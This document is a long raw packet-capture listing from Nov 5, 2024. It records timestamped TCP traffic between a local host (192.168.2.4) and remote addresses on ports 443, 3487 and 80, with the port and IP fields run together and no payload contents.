                                                                                                                                                            Nov 5, 2024 10:03:25.072088957 CET49868443192.168.2.4104.21.24.17
                                                                                                                                                            Nov 5, 2024 10:03:25.072093964 CET44349868104.21.24.17192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:25.072144985 CET49868443192.168.2.4104.21.24.17
                                                                                                                                                            Nov 5, 2024 10:03:25.072232008 CET44349868104.21.24.17192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:25.072247982 CET44349868104.21.24.17192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:25.072288036 CET49868443192.168.2.4104.21.24.17
                                                                                                                                                            Nov 5, 2024 10:03:25.072293043 CET44349868104.21.24.17192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:25.072324038 CET49868443192.168.2.4104.21.24.17
                                                                                                                                                            Nov 5, 2024 10:03:25.072344065 CET49868443192.168.2.4104.21.24.17
                                                                                                                                                            Nov 5, 2024 10:03:25.145802975 CET44349868104.21.24.17192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:25.145823002 CET44349868104.21.24.17192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:25.145925045 CET49868443192.168.2.4104.21.24.17
                                                                                                                                                            Nov 5, 2024 10:03:25.145931959 CET44349868104.21.24.17192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:25.145992041 CET49868443192.168.2.4104.21.24.17
                                                                                                                                                            Nov 5, 2024 10:03:25.146127939 CET44349868104.21.24.17192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:25.146152973 CET44349868104.21.24.17192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:25.146209002 CET49868443192.168.2.4104.21.24.17
                                                                                                                                                            Nov 5, 2024 10:03:25.146218061 CET44349868104.21.24.17192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:25.146260977 CET49868443192.168.2.4104.21.24.17
                                                                                                                                                            Nov 5, 2024 10:03:25.146559954 CET44349868104.21.24.17192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:25.146574974 CET44349868104.21.24.17192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:25.146604061 CET44349868104.21.24.17192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:25.146639109 CET49868443192.168.2.4104.21.24.17
                                                                                                                                                            Nov 5, 2024 10:03:25.146642923 CET44349868104.21.24.17192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:25.146668911 CET44349868104.21.24.17192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:25.146668911 CET49868443192.168.2.4104.21.24.17
                                                                                                                                                            Nov 5, 2024 10:03:25.146693945 CET49868443192.168.2.4104.21.24.17
                                                                                                                                                            Nov 5, 2024 10:03:25.146713972 CET49868443192.168.2.4104.21.24.17
                                                                                                                                                            Nov 5, 2024 10:03:25.146795988 CET49868443192.168.2.4104.21.24.17
                                                                                                                                                            Nov 5, 2024 10:03:25.146800995 CET44349868104.21.24.17192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:27.168437004 CET498933487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:27.173314095 CET348749893172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:27.173615932 CET498933487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:27.174010992 CET498933487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:27.178885937 CET348749893172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:28.063051939 CET348749893172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:28.065256119 CET498933487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:28.070632935 CET348749893172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:28.211075068 CET348749893172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:28.213973999 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:28.218938112 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:28.219027042 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:28.219058990 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:28.226262093 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:28.226946115 CET4990180192.168.2.4178.237.33.50
                                                                                                                                                            Nov 5, 2024 10:03:28.232570887 CET8049901178.237.33.50192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:28.236238003 CET4990180192.168.2.4178.237.33.50
                                                                                                                                                            Nov 5, 2024 10:03:28.236336946 CET4990180192.168.2.4178.237.33.50
                                                                                                                                                            Nov 5, 2024 10:03:28.242460966 CET8049901178.237.33.50192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:28.256860018 CET498933487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.094611883 CET8049901178.237.33.50192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.094727039 CET4990180192.168.2.4178.237.33.50
                                                                                                                                                            Nov 5, 2024 10:03:29.111079931 CET498933487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.112967014 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.113095999 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.113106012 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.113115072 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.113148928 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.113159895 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.113672972 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.113759041 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.113766909 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.113812923 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.116003036 CET348749893172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.260318995 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.260332108 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.260344028 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.260411024 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.260421038 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.260431051 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.260473013 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.260811090 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.260859966 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.261030912 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.261106968 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.261152983 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.261194944 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.261203051 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.261244059 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.261625051 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.261636019 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.261646986 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.261671066 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.303772926 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.408133030 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.408144951 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.408154964 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.408190966 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.408364058 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.408375025 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.408386946 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.408438921 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.408438921 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.408466101 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.408957958 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.408968925 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.408984900 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.408998013 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.409008026 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.409034967 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.409588099 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.409599066 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.409609079 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.409620047 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.409632921 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.409637928 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.409653902 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.409677982 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.410372972 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.410382986 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.410393000 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.410408974 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.410418987 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.410425901 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.410443068 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.460055113 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.556291103 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.556302071 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.556344032 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.556370020 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.556390047 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.556485891 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.556616068 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.556626081 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.556680918 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.556700945 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.556715965 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.556729078 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.556776047 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.556946039 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.556955099 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.556987047 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.557063103 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.557092905 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.557100058 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.557226896 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.557246923 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.557266951 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.557383060 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.557421923 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.557426929 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.557450056 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.557486057 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.557524920 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.557579994 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.557615995 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.557634115 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.557641983 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.557687998 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.557914019 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.557965994 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.558007956 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.558021069 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.558068037 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.558075905 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.558101892 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.558312893 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.558320999 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.558360100 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.558475018 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.558485031 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.558495045 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.558517933 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.558545113 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.558702946 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.558759928 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.558769941 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.558788061 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.558795929 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.558804989 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.558830023 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.559288025 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.559299946 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.559309959 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.559335947 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.559365034 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.559525013 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.559571981 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.559588909 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.559602022 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.559609890 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.559618950 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.559636116 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.560134888 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.560144901 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.560180902 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.573395967 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.573441029 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.573451996 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.573462963 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.573472977 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.573498011 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.616244078 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.703460932 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.703473091 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.703484058 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.703531981 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.703548908 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.703557968 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.703567028 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.703593969 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.703600883 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.703619003 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.703629017 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.703675985 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.703686953 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.703775883 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.703784943 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.703818083 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.704504967 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.704518080 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.704569101 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.706116915 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.706156969 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.706177950 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.706187963 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.706197977 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.706218004 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.706226110 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.706235886 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.706245899 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.706254959 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.706276894 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.706368923 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.706387043 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.706428051 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.706434965 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.706451893 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.706460953 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.706491947 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.706573963 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.706617117 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.706670046 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.706681013 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.706691027 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.706708908 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.706790924 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.706834078 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.706870079 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.706878901 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.706888914 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.706912994 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.706995010 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.707036972 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.707057953 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.707067013 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.707087994 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.707099915 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.707110882 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.707115889 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.707130909 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.707305908 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.707334042 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.707343102 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.707350969 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.707361937 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.707371950 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.707381964 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.707417965 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.707653046 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.707775116 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.707823038 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.707840919 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.707851887 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.707863092 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.707871914 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.707957983 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.707973957 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.707993984 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.708000898 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.708009005 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.708019972 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.708028078 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.708079100 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.708373070 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.708381891 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.708435059 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.708534002 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.708544016 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.708560944 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.708570004 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.708579063 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.708585978 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.708596945 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.708605051 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.708620071 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.708628893 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.708636999 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.708648920 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.708657980 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.708671093 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.708676100 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.708688021 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.708693027 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.708703995 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.708724976 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.709249020 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.709290028 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.709311008 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.709348917 CET348749900172.111.244.132192.168.2.4
